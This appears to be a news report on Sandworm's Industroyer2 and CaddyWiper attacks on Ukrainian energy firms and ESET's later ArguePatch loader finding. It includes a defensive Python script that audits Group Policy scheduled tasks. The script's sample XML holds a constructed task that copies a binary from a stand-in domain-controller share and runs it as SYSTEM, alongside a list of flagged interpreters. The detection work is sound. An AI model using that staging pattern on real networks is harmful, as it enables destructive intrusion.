Sandworm continues to attack Ukraine


Security experts from ESET reported that Sandworm continues to conduct cyber attacks against organizations in Ukraine.

Sandworm (also known as Telebots, Voodoo Bear, Iron Viking and BlackEnergy) is believed to be Unit 74455 of the GRU, the agency responsible for Russian military intelligence.

The group is believed to be behind a cyberattack on Ukraine’s power grid in December 2015, cyberattacks on Ukraine in 2017 using the NotPetya malware, various attempts to interfere in the French presidential election in 2017, and cyberattacks on the computer network of the Pyeongchang Winter Olympics in 2018.

In April 2022, Sandworm attacked energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper.

According to CERT-UA, the nation-state actors targeted high-voltage electrical substations with INDUSTROYER2; the variant analyzed by the researchers was tailored to the targeted substations.

The attackers also used the CADDYWIPER wiper against Windows-based systems, while servers running Linux were hit with the destructive scripts ORCSHRED, SOLOSHRED and AWFULSHRED.

“Centralized distribution and launch of CADDYWIPER is carried out through the Group Policy mechanism (GPO). The POWERGAP PowerShell script was used to add a group policy that loads file-destructor components from a domain controller and creates a scheduled task on the computer,” reads the bulletin published by the Ukrainian CERT. “Lateral movement between local network segments is made possible by creating chains of SSH tunnels. IMPACKET is used for remote command execution.”
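The delivery chain CERT-UA describes leaves a concrete artifact on every domain: a Group Policy Preference file (ScheduledTasks.xml under the policy's Machine\Preferences\ScheduledTasks folder in SYSVOL) whose task action pulls a payload from a domain controller share and runs it at a chosen time. The following Python script is an added example, not CERT-UA's or ESET's tooling, that parses such a file and flags tasks matching that pattern. The sample XML, task names, GUIDs, host names, paths and times are constructed for the example; the flagging heuristics (UNC or SYSVOL/NETLOGON paths in the action, a script interpreter or LOLBin as the command, immediate tasks, one-shot timed triggers) are the author's own choices.

```python
"""Audit Group Policy Preference scheduled tasks for the pattern CERT-UA describes:
a GPO-created task that fetches a payload from a domain controller share and runs it.
Example code written for this page; not CERT-UA's or ESET's tooling."""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Constructed sample of a GPP ScheduledTasks.xml, in the layout used under
# \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\ScheduledTasks\.
# Every name, GUID, host, path and timestamp below is made up for this example.
SAMPLE_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Update" image="0"
      changed="2022-04-08 09:12:31" uid="{8A1B2C3D-0000-4000-8000-000000000001}">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\Windows\System32\cmd.exe</Command>
            <Arguments>/c copy \\dc01.corp.example\SYSVOL\corp.example\scripts\cpd.exe C:\Windows\Temp\ &amp;&amp; C:\Windows\Temp\cpd.exe</Arguments>
          </Exec>
        </Actions>
        <Triggers>
          <TimeTrigger><StartBoundary>2022-04-08T17:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger>
        </Triggers>
      </Task>
    </Properties>
  </TaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Inventory" image="0"
      changed="2021-11-02 08:00:00" uid="{8A1B2C3D-0000-4000-8000-000000000002}">
    <Properties action="C" name="Inventory" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\Program Files\Inventory\agent.exe</Command>
            <Arguments>--report</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

UNC_RE = re.compile(r"\\\\[\w.-]+\\[\w$.-]+", re.IGNORECASE)       # \\host\share
DC_SHARE_RE = re.compile(r"\\(sysvol|netlogon)\\", re.IGNORECASE)  # DC-replicated shares
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def _text(elem, path):
    """Text of a child element, or '' when it is absent."""
    node = elem.find(path)
    return (node.text or "").strip() if node is not None else ""


def audit_gpp_tasks(xml_text):
    """Return one finding per task whose action matches a suspicious pattern.

    Each finding holds the task name, element kind (TaskV2 / ImmediateTaskV2 / Task),
    run-as principal, full command line, optional start time and the reasons flagged.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for task in root:
        props = task.find("Properties")
        if props is None:
            continue
        command = _text(props, "Task/Actions/Exec/Command")
        arguments = _text(props, "Task/Actions/Exec/Arguments")
        start = _text(props, "Task/Triggers/TimeTrigger/StartBoundary")
        action = f"{command} {arguments}".strip()
        reasons = []
        if DC_SHARE_RE.search(action) or UNC_RE.search(action):
            reasons.append("fetches or runs payload from a network share")
        if PureWindowsPath(command).name.lower() in INTERPRETERS:
            reasons.append("action is a script interpreter or LOLBin")
        if task.tag == "ImmediateTaskV2":
            reasons.append("immediate task: fires on the next policy refresh")
        if reasons and start:
            reasons.append(f"one-shot timed trigger at {start}")
        if reasons:
            findings.append({
                "name": task.get("name", ""),
                "kind": task.tag,
                "run_as": props.get("runAs", ""),
                "command_line": action,
                "start": start,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_gpp_tasks(SAMPLE_XML):
        print(f"[{f['kind']}] {f['name']} runAs={f['run_as']} start={f['start'] or '-'}")
        print(f"    {f['command_line']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run it against every Policies\{GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml in SYSVOL (and compare the file's `changed` timestamps with the policy's expected change history): a task that copies a binary from a domain controller share and launches it at a fixed future time is exactly the staging that preceded the planned April 8 shutdown.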

CERT-UA states that the APT group launched at least two waves of attacks on the energy facilities. The initial compromise occurred no later than February 2022. Notably, the shutdown of the electrical substations and the destruction of the company's infrastructure were scheduled for Friday evening, April 8, 2022.

However, the attacks were detected and neutralized by government experts with the help of cybersecurity companies ESET and Microsoft.

CERT-UA collected indicators of compromise for these attacks and shared them, along with the Yara rules, with a limited number of international partners and Ukrainian energy companies.

ESET, which assisted the Ukrainian government, published a detailed report on Industroyer2, the ICS malware used in the attack on a Ukrainian energy company.

Now ESET researchers have announced the discovery of a new variant of the malicious loader the attackers used in the Industroyer2 attacks; CERT-UA tracks the code as ArguePatch.

According to the researchers, the Industroyer2 attacks used a patched version of the Hex-Rays IDA Pro remote debugging server (win32_remote.exe), into which code was inserted to decrypt and launch CaddyWiper from an external file.

In the new variant, the APT group hid ArguePatch inside a legitimate ESET executable (eset_ssl_filtered_cert_importer.exe); the malicious code overwrites a function that is called during initialization of the MSVC runtime.

Analysis of the embedded code showed that it acts as a loader that executes the next-stage malware at a specified time.

“This approach replaces the need to configure a scheduled Windows task for a future attack. Perhaps this is a way to avoid detection using known TTPs,” ESET explained in a series of tweets.